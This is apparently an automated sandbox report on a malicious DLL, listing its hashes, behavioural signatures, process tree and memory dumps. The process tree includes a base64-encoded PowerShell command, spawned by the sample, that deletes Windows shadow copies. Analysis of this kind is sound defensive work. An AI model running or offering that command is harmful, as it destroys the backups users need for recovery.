Analysis
-
max time kernel
10s -
max time network
67s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-04-2021 20:04
Static task
static1
Behavioral task
behavioral1
Sample
e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e.dll
Resource
win7v20201028
Behavioral task
behavioral2
Sample
e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e.dll
Resource
win10v20201028
General
-
Target
e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e.dll
-
Size
166KB
-
MD5
a2fe81e5b83c0d1ea321429446870e18
-
SHA1
b1fc2a1e8e1739ecf9fe2e0b7b20618321eea765
-
SHA256
e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e
-
SHA512
b0a250932cebbcfed89564a67c6b5385b9a65e089810bd071b1be721af7fee55af8ec31fd7b415295b6bbd1b2f1ef564c4a8c3c7b40101d1e90e5fb0cd7905c9
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\P: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
rundll32.exepowershell.exepid process 1320 rundll32.exe 1320 rundll32.exe 3420 powershell.exe 3420 powershell.exe 3420 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1320 rundll32.exe Token: SeDebugPrivilege 3420 powershell.exe Token: SeBackupPrivilege 768 vssvc.exe Token: SeRestorePrivilege 768 vssvc.exe Token: SeAuditPrivilege 768 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1152 wrote to memory of 1320 1152 rundll32.exe rundll32.exe PID 1152 wrote to memory of 1320 1152 rundll32.exe rundll32.exe PID 1152 wrote to memory of 1320 1152 rundll32.exe rundll32.exe PID 1320 wrote to memory of 3420 1320 rundll32.exe powershell.exe PID 1320 wrote to memory of 3420 1320 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:184
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:768
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1320-114-0x0000000000000000-mapping.dmp
-
memory/3420-115-0x0000000000000000-mapping.dmp
-
memory/3420-121-0x0000025B42140000-0x0000025B42141000-memory.dmpFilesize
4KB
-
memory/3420-124-0x0000025B422F0000-0x0000025B422F1000-memory.dmpFilesize
4KB
-
memory/3420-127-0x0000025B41830000-0x0000025B41832000-memory.dmpFilesize
8KB
-
memory/3420-128-0x0000025B41833000-0x0000025B41835000-memory.dmpFilesize
8KB
-
memory/3420-137-0x0000025B41836000-0x0000025B41838000-memory.dmpFilesize
8KB